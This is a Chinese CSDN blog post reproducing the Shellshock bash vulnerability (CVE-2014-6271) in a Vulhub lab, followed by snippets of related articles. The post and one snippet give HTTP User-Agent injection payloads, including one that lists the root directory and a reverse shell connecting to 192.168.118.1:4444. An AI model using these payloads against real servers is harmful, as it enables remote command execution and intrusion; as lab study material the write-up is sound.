vulhub漏洞复现之bash（Shellshock CVE-2014-6271）

最新推荐文章于 2024-08-16 10:28:20 发布

Lin冲啊

最新推荐文章于 2024-08-16 10:28:20 发布

阅读量1.3k

点赞数

文章标签： bash 安全漏洞

本文链接：https://blog.csdn.net/weixin_43071873/article/details/110233234

版权

Shellshock 破壳漏洞 CVE-2014-6271

1.漏洞概述：
GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞，向环境变量值内的函数定义后添加多余的字符串会触发此漏洞，攻击者可利用此漏洞改变或绕过环境限制，以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码，在shell被调用后会被立即执行。
2.漏洞影响：GNU Bash <= 4.3
3.漏洞复现：
Vulhub搭建靶场，
在这里插入图片描述

进入靶场
在这里插入图片描述

通过bp抓包，修改User-Agent，
User-Agent: () { :;};echo ; echo; echo $(/bin/ls /);
在这里插入图片描述

反弹shell来一个。还是修改User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1;
nc监听，反弹成功

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Lin冲啊

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
2
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CVE-2014-6271 “破壳“ 漏洞（cgi-bin）

墨痕诉清风的博客

07-19

2684

CVE-2014-6271（即“破壳”漏洞）广泛存在与GNUBash版本小于等于4.3的*inux的系统之中，只要目标服务器开放着与Bash相交互的应用与服务，就有可能成功触发漏洞，获取目标系统当前Bash运行用户相同权限的shell接口。该漏洞利用条件较多，1.bash版本小于等于4.3，2.攻击者可以控制环境变量，3.新的bash进程被打开触发漏洞并执行命令。简单点说，没有cgi脚本继承环境变量，就玩不了；有cgi脚本的，bash版本过高也玩不了。catecho;do";};......

Bash Shellshock CVE-2014-6271 漏洞复现

weixin_43144118的博客

11-11

430

Bash Shellshock CVE-2014-6271 漏洞复现 Bash介绍 Bourne Again Shell（简称BASH）是在GNU/Linux上最流行的SHELL实现，于1980年诞生，经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。根据维基百科的描述：Bash，Unix shell的一种。1989年发布第一个正式版本，原先是计划用在GNU...

2 条评论您还未登录，请先登录后发表或查看评论

CVE-2014-6271-bash shellshock-破壳漏洞复现

m0_62008601的博客

08-06

3240

这些变量可以包含代码，在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场，服务启动后，有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied，那就是权限不足的原因了，那我们就修改一下权限，让它能够被访问。既然在victim.cgi可以执行命令，那么应该就可以进行反弹shell了，kali开启端口监听，执行反弹shell命令。.

shiro550反序列化漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）_shiro550原理

最新发布

baimao__Ch的博客

08-16

671

如何判断我的服务器是否受到了针对shiro550漏洞的攻击？检查日志：查看系统的日志文件，看是否有异常的访问记录或登录失败记录，如果发现了异常，可以进一步分析该记录是否与Shiro550漏洞有关。检查系统状态：检查系统是否存在异常状态，如系统崩溃、服务宕机等，这可能是攻击者利用Shiro550漏洞进行攻击导致的。检查用户行为：检查是否有用户在短时间内多次尝试登录或者进行异常操作，这可能是攻击者正在利用Shiro550漏洞尝试获取系统权限。

CVE-2014-6271漏洞复现

王嘟嘟的博客

01-16

3187

0x00 前言要是平时我肯定不会想打去复现这个漏洞的，但是由于需要学习shellshock漏洞的利用，所以这里可以进行一下复现 0x01 正文这里直接使用别人弄好的docker，简单又方便 docker pull hmlio/vaas-cve-2014-6271 下载完成之后，开启docker docker run -d -p 80:80 hmlio/vaas-cve-2014-6271 访问...

bash(CVE-2014-6271) shellshock-破壳漏洞复现

weixin_45095113的博客

01-03

601

bash(CVE-2014-6271) shellshock-破壳漏洞复现

CVE-2014-6271破壳(shellshock)漏洞复现记录

dengzhasong7076的博客

07-05

577

docker大法好搭建环境： centos 6.6 x64 docker安装看网上说docker需要内核3.8以上，而且只能运行在64位系统 centos 6.6内核低了一点，升级一下内核。内核升级 a、升级内核 cd /etc/yum.repos.d wget http://www.hop5.in/yum/el6/hop5.repo yum install kernel-ml-a...

详细的漏洞复现：Shellshock CVE-2014-6271 CVE-2014-7169

dongchijue7318的博客

09-11

1522

目录前言漏洞原理利用方式复现过程 1. 环境准备 (1) 为容器配置固定IP地址 (2) 查看bash版本 2. 本地验证：测试镜像系统是否存在漏洞 3. 远程模拟验证（原理验证） ...

Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)

ad12456的博客

05-18

483

Shellshock远程命令注入

破壳漏洞(CVE-2014-6271)综合分析1

08-04

【破壳漏洞(CVE-2014-6271)综合分析】一、威胁卡片破壳漏洞，也称为Bash Shellshock，是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271，属于A级威胁响应...

CVE-2014-6271 Shellshock 破壳漏洞复现

weixin_30677475的博客

07-18

587

补坑。什么是shellshock ShellShock是一个BashShell漏洞(据说不仅仅是Bash，其他shell也可能有这个漏洞). 一般情况来说，系统里面的Shell是有严格的权限控制的，如果没有相应的权限，是根本看不到某些命令的存在，更不要说执行这些命令。但是，Bash在运行的过程中会调用操作系统的环境变量，并且会执行一些设置命令。通过ShellShock漏洞，入侵者可...

Bash破壳漏洞

weixin_33911824的博客

07-30

234

“破壳”是一个严重漏洞的别名，在Red Hat、CentOS、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10中均拥有存在CVE-2014-6271（即“破壳”漏洞）漏洞的Bash版本，同时由于Bash在各主流操作系统的广泛应用，此漏洞的影响范围包括但不限于大多数应用Bash的Unix、Linux、Mac OS X，而针对这些操作系统管理下...

cve-2014-6271 复现

PDblue的博客

04-12

1777

CVE-2014-6271，主要存在于 bash 1.14 - 4.3 版本中，受影响的 linux 系统包括：Red Hat 企业 Linux (versions 4 ~7) 、Fedora distribution、CentOS (versions 5 ~7)、Ubuntu 10.04 LTS,12.04 LTS 和 14.04 LTS、Debian 等。使用vulhub搭建漏洞环境访...

Shellshock破壳突破（CVE-2014-6271）复现

willow_liang的博客

04-15

371

1.使用vluhub的环境进行复现 docker-compose build docker-compose up -d docker ps 环境生成后会有两个页面。http://192.168.0.105:8080/victim.cgi 和 http://192.168.0.105:8080/safe.cgi 其中safe.cgi是最新版bash生成的页面，viceim.cgi是bash4.3生成的页面，使用payload访问victim.cgi User-Agent: () { foo; };

Bash Bug（破壳漏洞，Shellshock） - CVE-2014-6271

HaSaKing的博客

05-28

820

破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补，您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。

CVE-2014-6271——bash破壳漏洞复现

per_se_veran_ce的博客

08-23

1055

（1）检查是否存在bash漏洞 env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test” 安装、配置apache服务 Apache支持CGI 在cgi-bin下创建一个cgi测试文件test.cgi，并赋予它777的权限 chmod 777 test.cgi curl -H 'x: () { :;...

Shellshock远程命令注入 CVE-2014-6271 漏洞复现

ADummy的博客

03-04

870

Shellshock远程命令注入（CVE-2014-6271） by ADummy 0x00利用路线 Burpsuite发包—>命令执行 0x01漏洞介绍 CVE-2014-6271（即“破壳”漏洞）广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中，只要目标服务器开放着与Bash相交互的应用与服务，就有可能成功触发漏洞，获取目标系统当前Bash运行用户相同权限的shell接口 0x 02漏洞复现当您访问时，http://your-ip/您应该看到两个文件： saf

Bash(shellshock)

chocomoss的博客

11-30

289

影响漏洞影响：GNU Bash <= 4.3 启动服务器搭建：docker-compose up -d 查看：docker-compose ps 抵达网站抓包拦截 User-Agent: () { :;};echo ; echo; echo $(/bin/ls /); 反弹shell：User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1; ...